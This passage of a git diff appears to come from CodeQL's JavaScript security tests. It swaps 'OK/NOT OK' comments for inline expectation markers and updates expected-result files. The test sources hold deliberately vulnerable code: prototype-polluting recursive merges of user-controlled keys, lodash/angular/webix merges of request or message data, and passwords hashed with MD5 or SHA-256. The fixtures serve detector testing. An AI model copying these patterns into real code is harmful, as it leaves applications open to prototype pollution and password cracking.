transform(src[key], fn); } return src; } @@ -141,17 +141,17 @@ function clone(src) { if (typeof src !== 'object') return src; let result = {}; for (let key in src) { - result[key] = clone(src[key]); // OK + result[key] = clone(src[key]); } return result; } function higherOrderRecursion(dst, src, callback) { - for (let key in src) { + for (let key in src) { // $ Source if (dst[key]) { callback(dst, src, key); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -168,7 +168,7 @@ function instanceofObjectGuard(dst, src) { if (typeof dstValue === 'object' && dstValue instanceof Object) { instanceofObjectGuard(dstValue, src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -181,7 +181,7 @@ function copyWithBlacklist(dst, src) { if (dst[key]) { copyWithBlacklist(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -189,11 +189,11 @@ function copyWithBlacklist(dst, src) { function copyUsingPlainForLoop(dst, src) { let keys = Object.keys(src); for (let i = 0; i < keys.length; ++i) { - let key = keys[i]; + let key = keys[i]; // $ Source if (dst[key]) { copyUsingPlainForLoop(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -205,7 +205,7 @@ function copyUsingPlainForLoopNoAlias(dst, src) { if (dst[key]) { copyUsingPlainForLoopNoAlias(dst[keys[i]], src[keys[i]]); } else { - dst[keys[i]] = src[keys[i]]; // NOT OK - but not flagged + dst[keys[i]] = src[keys[i]]; // $ MISSING: Alert } } } @@ -214,7 +214,7 @@ function deepSet(map, key1, key2, value) { if (!map[key1]) { map[key1] = Object.create(null); } - map[key1][key2] = value; // OK + map[key1][key2] = value; } function deepSetCaller(data) { @@ -230,12 +230,12 @@ function deepSetBad(map, key1, key2, value) { if (!map[key1]) { map[key1] = Object.create(null); } - map[key1][key2] = value; // NOT OK - object literal can flow here + map[key1][key2] = value; // $ Alert - object literal can flow here } function deepSetCallerBad(data) { let map1 = Object.create(null); - for (let key in data) { + for (let key in data) { // $ Source deepSetBad({}, key, 'x', data[key]); // oops deepSetBad(map1, 'x', key, data[key]); } @@ -254,7 +254,7 @@ function mergeWithCopy(dst, src) { let result = maybeCopy(dst); for (let key in src) { if (src.hasOwnProperty(key)) { - result[key] = mergeWithCopy(dst[key], src[key]); // OK + result[key] = mergeWithCopy(dst[key], src[key]); } } return result; @@ -262,22 +262,22 @@ function mergeWithCopy(dst, src) { function copyUsingEntries(dst, src) { Object.entries(src).forEach(entry => { - let key = entry[0]; + let key = entry[0]; // $ Source let value = entry[1]; if (dst[key]) { copyUsingEntries(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } function copyUsingReflect(dst, src) { - Reflect.ownKeys(src).forEach(key => { + Reflect.ownKeys(src).forEach(key => { // $ Source if (dst[key]) { copyUsingReflect(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } }); } @@ -290,7 +290,7 @@ function copyWithPath(dst, src, path) { } else { let target = {}; target[path] = {}; - target[path][key] = src[key]; // OK + target[path][key] = src[key]; doSomething(target); } } @@ -299,34 +299,34 @@ function copyWithPath(dst, src, path) { } function typeofObjectTest(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (src.hasOwnProperty(key)) { let value = src[key]; if (dst[key] && typeof value === 'object') { typeofObjectTest(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } } function mergeRephinementNode(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (src.hasOwnProperty(key)) { if (key === key && key === key) continue; // Create a phi-node of refinement nodes let value = src[key]; if (dst[key] && typeof value === 'object') { mergeRephinementNode(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } } function mergeSelective(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (src.hasOwnProperty(key)) { // Only 'prefs' is merged recursively if (key in dst && key !== 'prefs') { @@ -335,7 +335,7 @@ function mergeSelective(dst, src) { if (dst[key]) { mergeSelective(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; // $ Alert } } } @@ -347,14 +347,14 @@ function isNonArrayObject(item) { function mergePlainObjectsOnly(target, source) { if (isNonArrayObject(target) && isNonArrayObject(source)) { - Object.keys(source).forEach(key => { + Object.keys(source).forEach(key => { // $ Source if (key === '__proto__') { return; } if (isNonArrayObject(source[key]) && key in target) { target[key] = mergePlainObjectsOnly(target[key], source[key], options); } else { - target[key] = source[key]; // OK - but flagged anyway due to imprecise barrier for captured variable + target[key] = source[key]; // $ SPURIOUS: Alert - due to imprecise barrier for captured variable } }); } @@ -370,7 +370,7 @@ function mergePlainObjectsOnlyNoClosure(target, source) { if (isNonArrayObject(source[key]) && key in target) { target[key] = mergePlainObjectsOnlyNoClosure(target[key], source[key], options); } else { - target[key] = source[key]; // OK + target[key] = source[key]; } } } @@ -378,7 +378,7 @@ function mergePlainObjectsOnlyNoClosure(target, source) { } function forEachProp(obj, callback) { - for (let key in obj) { + for (let key in obj) { // $ Source if (obj.hasOwnProperty(key)) { callback(key, obj[key]); } @@ -390,7 +390,7 @@ function mergeUsingCallback(dst, src) { if (dst[key]) { mergeUsingCallback(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK - but not currently flagged + dst[key] = src[key]; // $ MISSING: Alert } }); } @@ -400,7 +400,7 @@ function mergeUsingCallback2(dst, src) { if (dst[key]) { mergeUsingCallback2(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -410,13 +410,13 @@ function wrappedRead(obj, key) { } function copyUsingWrappedRead(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source let value = wrappedRead(src, key); let target = wrappedRead(dst, key); if (target) { copyUsingWrappedRead(target, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -427,13 +427,13 @@ function almostSafeRead(obj, key) { } function copyUsingAlmostSafeRead(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source let value = almostSafeRead(src, key); let target = almostSafeRead(dst, key); if (target) { copyUsingAlmostSafeRead(target, value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } } } @@ -450,43 +450,43 @@ function copyUsingSafeRead(dst, src) { if (target) { copyUsingSafeRead(target, value); } else { - dst[key] = value; // OK + dst[key] = value; } } } function copyUsingForOwn(dst, src) { let forOwn = import('for-own'); - forOwn(src, (value, key, o) => { + forOwn(src, (value, key, o) => { // $ Source if (dst[key]) { copyUsingForOwn(dst[key], src[key]); } else { // Handle a few different ways to access src[key] - if (something()) dst[key] = src[key]; // NOT OK - if (something()) dst[key] = o[key]; // NOT OK - if (something()) dst[key] = value; // NOT OK + if (something()) dst[key] = src[key]; // $ Alert + if (something()) dst[key] = o[key]; // $ Alert + if (something()) dst[key] = value; // $ Alert } }); } function copyUsingUnderscoreOrLodash(dst, src) { - _.each(src, (value, key, o) => { + _.each(src, (value, key, o) => { // $ Source if (dst[key]) { copyUsingUnderscoreOrLodash(dst[key], src[key]); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } let isPlainObject = require('is-plain-object'); function copyPlainObject(dst, src) { - for (let key in src) { + for (let key in src) { // $ Source if (key === '__proto__') continue; if (dst[key] && isPlainObject(src)) { copyPlainObject(dst[key], src[key]); } else { - dst[key] = src[key]; // OK - but flagged anyway + dst[key] = src[key]; // $ SPURIOUS: Alert } } } @@ -499,7 +499,7 @@ function copyPlainObject2(dst, src) { if (isPlainObject(target) && isPlainObject(value)) { copyPlainObject2(target, value); } else { - dst[key] = value; // OK + dst[key] = value; } } } @@ -508,13 +508,13 @@ function copyPlainObject2(dst, src) { function usingDefineProperty(dst, src) { let keys = Object.keys(src); for (let i = 0; i < keys.length; ++i) { - let key = keys[i]; + let key = keys[i]; // $ Source if (dst[key]) { usingDefineProperty(dst[key], src[key]); } else { var descriptor = {}; descriptor.value = src[key]; - Object.defineProperty(dst, key, descriptor); // NOT OK + Object.defineProperty(dst, key, descriptor); // $ Alert } } } @@ -522,11 +522,11 @@ function usingDefineProperty(dst, src) { function copyUsingForInAndRest(...args) { const dst = args[0]; const src = args[1]; - for (let key in src) { + for (let key in src) { // $ Source if (dst[key]) { copyUsingForInAndRest(dst[key], src[key]); } else { - dst[key] = src[key]; // NOT OK + dst[key] = src[key]; // $ Alert } } } @@ -535,7 +535,7 @@ function forEachPropNoTempVar(obj, callback) { const keys = Object.keys(obj) const len = keys.length for (let i = 0; i < len; i++) { - callback(keys[i], obj[keys[i]]) + callback(keys[i], obj[keys[i]]) // $ Source } } @@ -544,7 +544,7 @@ function mergeUsingCallback3(dst, src) { if (dst[key]) { mergeUsingCallback3(dst[key], value); } else { - dst[key] = value; // NOT OK + dst[key] = value; // $ Alert } }); } @@ -556,7 +556,7 @@ function copyHasOwnProperty2(dst, src) { if (Object.hasOwn(dst, key)) { copyHasOwnProperty2(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -568,7 +568,7 @@ function copyHasOwnProperty3(dst, src) { if (_.has(dst, key)) { copyHasOwnProperty3(dst[key], src[key]); } else { - dst[key] = src[key]; // OK + dst[key] = src[key]; } } } @@ -598,11 +598,11 @@ function captureBarrier(obj) { } function merge_captureBarrier(dest, source) { - for (const key of Object.keys(source)) { + for (const key of Object.keys(source)) { // $ Source if (dest[key]) { merge_captureBarrier(dest[key], source[key]); } else { - dest[key] = captureBarrier(source[key]); // OK - but currently flagged anyway + dest[key] = captureBarrier(source[key]); // $ SPURIOUS: Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.expected b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.expected index f687007db4dd..8b08f2a20afd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.expected +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.expected @@ -1,15 +1,46 @@ +#select +| angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | angularmerge.js:1:30:1:34 | event | angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | angularmerge.js:1:30:1:34 | event | user-controlled value | angularmerge.js:2:3:2:43 | angular ... .data)) | angular | +| src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | user-controlled value | src-vulnerable-lodash/package.json:3:19:3:26 | "4.17.4" | lodash | +| src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... e\\n } | src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... e\\n } | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | user-controlled value | src-vulnerable-lodash/package.json:3:19:3:26 | "4.17.4" | lodash | +| src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... g\\n } | src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... g\\n } | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | user-controlled value | src-vulnerable-lodash/package.json:3:19:3:26 | "4.17.4" | lodash | +| webix/webix.html:4:26:4:47 | JSON.pa ... t.data) | webix/webix.html:3:34:3:38 | event | webix/webix.html:4:26:4:47 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.html:3:34:3:38 | event | user-controlled value | webix/webix.html:4:9:4:48 | webix.e ... .data)) | webix | +| webix/webix.html:5:24:5:45 | JSON.pa ... t.data) | webix/webix.html:3:34:3:38 | event | webix/webix.html:5:24:5:45 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.html:3:34:3:38 | event | user-controlled value | webix/webix.html:5:9:5:46 | webix.c ... .data)) | webix | +| webix/webix.js:4:22:4:43 | JSON.pa ... t.data) | webix/webix.js:3:30:3:34 | event | webix/webix.js:4:22:4:43 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.js:3:30:3:34 | event | user-controlled value | webix/webix.js:4:5:4:44 | webix.e ... .data)) | webix | +| webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | webix/webix.js:3:30:3:34 | event | webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.js:3:30:3:34 | event | user-controlled value | webix/webix.js:5:5:5:42 | webix.c ... .data)) | webix | +edges +| angularmerge.js:1:30:1:34 | event | angularmerge.js:2:32:2:36 | event | provenance | | +| angularmerge.js:2:32:2:36 | event | angularmerge.js:2:32:2:41 | event.data | provenance | | +| angularmerge.js:2:32:2:41 | event.data | angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | provenance | Config | +| src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... e\\n } | provenance | | +| src-vulnerable-lodash/tst.js:14:9:16:5 | opts [thing] | src-vulnerable-lodash/tst.js:18:16:18:19 | opts [thing] | provenance | | +| src-vulnerable-lodash/tst.js:14:16:16:5 | {\\n ... e\\n } [thing] | src-vulnerable-lodash/tst.js:14:9:16:5 | opts [thing] | provenance | | +| src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | src-vulnerable-lodash/tst.js:14:16:16:5 | {\\n ... e\\n } [thing] | provenance | | +| src-vulnerable-lodash/tst.js:18:16:18:19 | opts [thing] | src-vulnerable-lodash/tst.js:18:16:18:25 | opts.thing | provenance | | +| src-vulnerable-lodash/tst.js:18:16:18:25 | opts.thing | src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... g\\n } | provenance | | +| webix/webix.html:3:34:3:38 | event | webix/webix.html:4:37:4:41 | event | provenance | | +| webix/webix.html:3:34:3:38 | event | webix/webix.html:5:35:5:39 | event | provenance | | +| webix/webix.html:4:37:4:41 | event | webix/webix.html:4:37:4:46 | event.data | provenance | | +| webix/webix.html:4:37:4:46 | event.data | webix/webix.html:4:26:4:47 | JSON.pa ... t.data) | provenance | Config | +| webix/webix.html:5:35:5:39 | event | webix/webix.html:5:35:5:44 | event.data | provenance | | +| webix/webix.html:5:35:5:44 | event.data | webix/webix.html:5:24:5:45 | JSON.pa ... t.data) | provenance | Config | +| webix/webix.js:3:30:3:34 | event | webix/webix.js:4:33:4:37 | event | provenance | | +| webix/webix.js:3:30:3:34 | event | webix/webix.js:5:31:5:35 | event | provenance | | +| webix/webix.js:4:33:4:37 | event | webix/webix.js:4:33:4:42 | event.data | provenance | | +| webix/webix.js:4:33:4:42 | event.data | webix/webix.js:4:22:4:43 | JSON.pa ... t.data) | provenance | Config | +| webix/webix.js:5:31:5:35 | event | webix/webix.js:5:31:5:40 | event.data | provenance | | +| webix/webix.js:5:31:5:40 | event.data | webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | provenance | Config | nodes | angularmerge.js:1:30:1:34 | event | semmle.label | event | | angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | semmle.label | JSON.pa ... t.data) | | angularmerge.js:2:32:2:36 | event | semmle.label | event | | angularmerge.js:2:32:2:41 | event.data | semmle.label | event.data | | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | semmle.label | req.query.foo | -| src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... K\\n } | semmle.label | {\\n ... K\\n } | +| src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... e\\n } | semmle.label | {\\n ... e\\n } | | src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | semmle.label | req.query.value | | src-vulnerable-lodash/tst.js:14:9:16:5 | opts [thing] | semmle.label | opts [thing] | | src-vulnerable-lodash/tst.js:14:16:16:5 | {\\n ... e\\n } [thing] | semmle.label | {\\n ... e\\n } [thing] | | src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | semmle.label | req.query.value | -| src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... K\\n } | semmle.label | {\\n ... K\\n } | +| src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... g\\n } | semmle.label | {\\n ... g\\n } | | src-vulnerable-lodash/tst.js:18:16:18:19 | opts [thing] | semmle.label | opts [thing] | | src-vulnerable-lodash/tst.js:18:16:18:25 | opts.thing | semmle.label | opts.thing | | webix/webix.html:3:34:3:38 | event | semmle.label | event | @@ -26,35 +57,4 @@ nodes | webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | semmle.label | JSON.pa ... t.data) | | webix/webix.js:5:31:5:35 | event | semmle.label | event | | webix/webix.js:5:31:5:40 | event.data | semmle.label | event.data | -edges -| angularmerge.js:1:30:1:34 | event | angularmerge.js:2:32:2:36 | event | provenance | | -| angularmerge.js:2:32:2:36 | event | angularmerge.js:2:32:2:41 | event.data | provenance | | -| angularmerge.js:2:32:2:41 | event.data | angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | provenance | Config | -| src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... K\\n } | provenance | | -| src-vulnerable-lodash/tst.js:14:9:16:5 | opts [thing] | src-vulnerable-lodash/tst.js:18:16:18:19 | opts [thing] | provenance | | -| src-vulnerable-lodash/tst.js:14:16:16:5 | {\\n ... e\\n } [thing] | src-vulnerable-lodash/tst.js:14:9:16:5 | opts [thing] | provenance | | -| src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | src-vulnerable-lodash/tst.js:14:16:16:5 | {\\n ... e\\n } [thing] | provenance | | -| src-vulnerable-lodash/tst.js:18:16:18:19 | opts [thing] | src-vulnerable-lodash/tst.js:18:16:18:25 | opts.thing | provenance | | -| src-vulnerable-lodash/tst.js:18:16:18:25 | opts.thing | src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... K\\n } | provenance | | -| webix/webix.html:3:34:3:38 | event | webix/webix.html:4:37:4:41 | event | provenance | | -| webix/webix.html:3:34:3:38 | event | webix/webix.html:5:35:5:39 | event | provenance | | -| webix/webix.html:4:37:4:41 | event | webix/webix.html:4:37:4:46 | event.data | provenance | | -| webix/webix.html:4:37:4:46 | event.data | webix/webix.html:4:26:4:47 | JSON.pa ... t.data) | provenance | Config | -| webix/webix.html:5:35:5:39 | event | webix/webix.html:5:35:5:44 | event.data | provenance | | -| webix/webix.html:5:35:5:44 | event.data | webix/webix.html:5:24:5:45 | JSON.pa ... t.data) | provenance | Config | -| webix/webix.js:3:30:3:34 | event | webix/webix.js:4:33:4:37 | event | provenance | | -| webix/webix.js:3:30:3:34 | event | webix/webix.js:5:31:5:35 | event | provenance | | -| webix/webix.js:4:33:4:37 | event | webix/webix.js:4:33:4:42 | event.data | provenance | | -| webix/webix.js:4:33:4:42 | event.data | webix/webix.js:4:22:4:43 | JSON.pa ... t.data) | provenance | Config | -| webix/webix.js:5:31:5:35 | event | webix/webix.js:5:31:5:40 | event.data | provenance | | -| webix/webix.js:5:31:5:40 | event.data | webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | provenance | Config | subpaths -#select -| angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | angularmerge.js:1:30:1:34 | event | angularmerge.js:2:21:2:42 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | angularmerge.js:1:30:1:34 | event | user-controlled value | angularmerge.js:2:3:2:43 | angular ... .data)) | angular | -| src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | src-vulnerable-lodash/tst.js:7:17:7:29 | req.query.foo | user-controlled value | src-vulnerable-lodash/package.json:3:19:3:26 | "4.17.4" | lodash | -| src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... K\\n } | src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | src-vulnerable-lodash/tst.js:10:17:12:5 | {\\n ... K\\n } | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | src-vulnerable-lodash/tst.js:11:16:11:30 | req.query.value | user-controlled value | src-vulnerable-lodash/package.json:3:19:3:26 | "4.17.4" | lodash | -| src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... K\\n } | src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | src-vulnerable-lodash/tst.js:17:17:19:5 | {\\n ... K\\n } | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | src-vulnerable-lodash/tst.js:15:14:15:28 | req.query.value | user-controlled value | src-vulnerable-lodash/package.json:3:19:3:26 | "4.17.4" | lodash | -| webix/webix.html:4:26:4:47 | JSON.pa ... t.data) | webix/webix.html:3:34:3:38 | event | webix/webix.html:4:26:4:47 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.html:3:34:3:38 | event | user-controlled value | webix/webix.html:4:9:4:48 | webix.e ... .data)) | webix | -| webix/webix.html:5:24:5:45 | JSON.pa ... t.data) | webix/webix.html:3:34:3:38 | event | webix/webix.html:5:24:5:45 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.html:3:34:3:38 | event | user-controlled value | webix/webix.html:5:9:5:46 | webix.c ... .data)) | webix | -| webix/webix.js:4:22:4:43 | JSON.pa ... t.data) | webix/webix.js:3:30:3:34 | event | webix/webix.js:4:22:4:43 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.js:3:30:3:34 | event | user-controlled value | webix/webix.js:4:5:4:44 | webix.e ... .data)) | webix | -| webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | webix/webix.js:3:30:3:34 | event | webix/webix.js:5:20:5:41 | JSON.pa ... t.data) | Prototype pollution caused by merging a $@ using a vulnerable version of $@. | webix/webix.js:3:30:3:34 | event | user-controlled value | webix/webix.js:5:5:5:42 | webix.c ... .data)) | webix | diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.qlref b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.qlref index c25a469a4d03..e2fd61cc5225 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/PrototypePollutingMergeCall.qlref @@ -1 +1,2 @@ -Security/CWE-915/PrototypePollutingMergeCall.ql \ No newline at end of file +query: Security/CWE-915/PrototypePollutingMergeCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js index 041d9adf02fc..57e74adc18b2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/angularmerge.js @@ -1,3 +1,3 @@ -addEventListener("message", (event) => { - angular.merge({}, JSON.parse(event.data)); // NOT OK +addEventListener("message", (event) => { // $ Source + angular.merge({}, JSON.parse(event.data)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js index ba7d026b9cd9..8e50da57e315 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-non-vulnerable-lodash/tst.js @@ -4,5 +4,5 @@ let _ = require('lodash'); let app = express(); app.get('/hello', function(req, res) { - _.merge({}, req.query.foo); // OK + _.merge({}, req.query.foo); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js index b1da6d9ab05d..270038961d19 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/src-vulnerable-lodash/tst.js @@ -4,17 +4,17 @@ let _ = require('lodash'); let app = express(); app.get('/hello', function(req, res) { - _.merge({}, req.query.foo); // NOT OK - _.merge({}, req.query); // NOT OK - but not flagged + _.merge({}, req.query.foo); // $ Alert + _.merge({}, req.query); // $ MISSING: Alert _.merge({}, { - value: req.query.value // NOT OK - }); + value: req.query.value // $ Source + }); // $ Alert let opts = { - thing: req.query.value // wrapped and unwrapped value + thing: req.query.value // $ Source - wrapped and unwrapped value }; _.merge({}, { - value: opts.thing // NOT OK - }); + value: opts.thing + }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html index 02d6d086d547..ccd317916100 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.html @@ -1,7 +1,7 @@ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js index acbfa2acbb42..1b281d5250cc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingMergeCall/webix/webix.js @@ -1,6 +1,6 @@ import * as webix from "webix"; -addEventListener("message", (event) => { - webix.extend({}, JSON.parse(event.data)); // NOT OK - webix.copy({}, JSON.parse(event.data)); // NOT OK +addEventListener("message", (event) => { // $ Source + webix.extend({}, JSON.parse(event.data)); // $ Alert + webix.copy({}, JSON.parse(event.data)); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-916/InsufficientPasswordHash.qlref b/javascript/ql/test/query-tests/Security/CWE-916/InsufficientPasswordHash.qlref index 77fc8c3a1d2f..312cee377c3c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-916/InsufficientPasswordHash.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-916/InsufficientPasswordHash.qlref @@ -1 +1,2 @@ -Security/CWE-916/InsufficientPasswordHash.ql \ No newline at end of file +query: Security/CWE-916/InsufficientPasswordHash.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-916/tst.js b/javascript/ql/test/query-tests/Security/CWE-916/tst.js index c5f1c31127a8..d41c6b719a18 100644 --- a/javascript/ql/test/query-tests/Security/CWE-916/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-916/tst.js @@ -1,9 +1,9 @@ var password = "secret"; -require("bcrypt").hash(password); // OK +require("bcrypt").hash(password); -require('crypto').createCipher('aes192').write(password); // NOT OK +require('crypto').createCipher('aes192').write(password); // $ Alert -require('crypto').createHash('sha256').write(password); // NOT OK +require('crypto').createHash('sha256').write(password); // $ Alert -require('crypto').createHash('md5').write(password); // NOT OK +require('crypto').createHash('md5').write(password); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.expected b/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.expected index 5a267ea56891..4a8f524f8624 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.expected +++ b/javascript/ql/test/query-tests/Security/CWE-918/ClientSideRequestForgery.expected @@ -1,3 +1,8 @@ +#select +| clientSide.js:12:5:12:55 | request ... '/id') | clientSide.js:11:19:11:40 | window. ... .search | clientSide.js:12:13:12:54 | 'https: ... + '/id' | The $@ of this request depends on a $@. | clientSide.js:12:13:12:54 | 'https: ... + '/id' | URL | clientSide.js:11:19:11:40 | window. ... .search | user-provided value | +| clientSide.js:14:5:14:64 | request ... search) | clientSide.js:14:42:14:63 | window. ... .search | clientSide.js:14:13:14:63 | 'https: ... .search | The $@ of this request depends on a $@. | clientSide.js:14:13:14:63 | 'https: ... .search | URL | clientSide.js:14:42:14:63 | window. ... .search | user-provided value | +| clientSide.js:17:5:17:58 | request ... '/id') | clientSide.js:16:22:16:41 | window.location.hash | clientSide.js:17:13:17:57 | 'https: ... + '/id' | The $@ of this request depends on a $@. | clientSide.js:17:13:17:57 | 'https: ... + '/id' | URL | clientSide.js:16:22:16:41 | window.location.hash | user-provided value | +| clientSide.js:21:5:21:54 | request ... '/id') | clientSide.js:20:18:20:28 | window.name | clientSide.js:21:13:21:53 | 'https: ... + '/id' | The $@ of this request depends on a $@. | clientSide.js:21:13:21:53 | 'https: ... + '/id' | URL | clientSide.js:20:18:20:28 | window.name | user-provided value | edges | 